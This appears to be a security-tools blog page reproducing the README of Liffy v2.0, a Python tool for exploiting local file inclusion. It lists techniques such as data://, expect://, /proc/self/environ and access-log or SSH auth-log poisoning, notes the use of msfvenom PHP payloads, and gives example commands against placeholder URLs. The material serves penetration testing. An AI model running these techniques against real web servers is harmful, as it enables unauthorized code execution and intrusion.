Liffy is a local file inclusion exploitation tool. A little python tool to perform Local file inclusion.
Liffy-v2.0 is the improved version of it which was originally created by rotlogix/liffy. The latter is no longer available and the former hasn’t seen any development for a long time.
Installation
Make sure you are using python3
for the Installation process. liffy doesn't support python2
git clone http://github.com/mzfr/liffy
python3 -m venv Ex: python3 -m venv liffy
source liffy/bin/activate
pip3 install -r requirements.txt
NOTE -It uses msfvenom for generating php payload, So you should have metasploit installed
Also Read – Metabigor : Intelligence Tool But Without API Key
Usage
usage: liffy.py [-h] [-d] [-i] [-e] [-f] [-p] [-a]
[-ns] [-r] [–ssh] [-l LOCATION] [–cookies COOKIES]
url
Positional Arguments:
url URL to test for LFI
Optional Arguments:
-h, –help show this help message and exit
-d, –data Use data:// technique
-i, –input Use input:// technique
-e, –expect Use expect:// technique
-f, –filter Use filter:// technique
-p, –proc Use /proc/self/environ technique
-a, –access access logs technique
-ns, –nostager execute payload directly, do not use stager
-r, –relative use path traversal sequences for attack
–ssh SSH auth log poisoning
-l LOCATION, –location LOCATION
path to the target file (access log, auth log, etc.)
–cookies COOKIES session cookies for authentication
Option: -d
or --data
Ex: python liffy.py http://example.com/?id= -d
Option: -i
or --input
Ex: python liffy.py http://example.com/?id= -i
Option: -e
or --expect
Ex: python liffy.py http://example.com/?id= -e
Option: -f
or --filter
Ex: python liffy.py http://example.com/?id= -f
Option: -p
or --proc
Ex: python liffy.py http://example.com/?id= -p
Option: -a
or --access
Ex: python liffy.py http://example.com/?id= -a
Option: -s
or --ssh
Ex: python liffy.py http://example.com/?id= -s
Option: -r
This option can be used along with other options so relatively traverse the directories.
EX:
python liffy.py http://example.com/?id= -s -r
python liffy.py http://example.com/?id= -p -r
python liffy.py http://example.com/?id= -a -r
Option: -l
or --location
This option has to be used either with all the log techniques like authlog
, sshlog
EX:
python liffy.py http://example.com/?id= -s -l /var/auth.log
python liffy.py http://example.com/?id= -a -l /var/apache2/access.log
By default the following location is used:
/var/log/auth.log
/var/log/apache2/access.log
Credits:
This repository contains tools created by yogSahare0 while learning Python 3 for ethical hacking and penetration testing.…
"NetSecChallenger" provides a suite of automated tools designed for security professionals and network administrators to…
The essential tool for cybersecurity enthusiasts! This guide provides a detailed walkthrough on how to…
Meet "Poodone," the ultimate Python script designed for cybersecurity enthusiasts and professionals alike. Packed with…
The Linux version is no longer supported! The last Linux version is 6.0 that you…
Jin is a hacking command-line tools designed to make your scan port, gathering urls, check…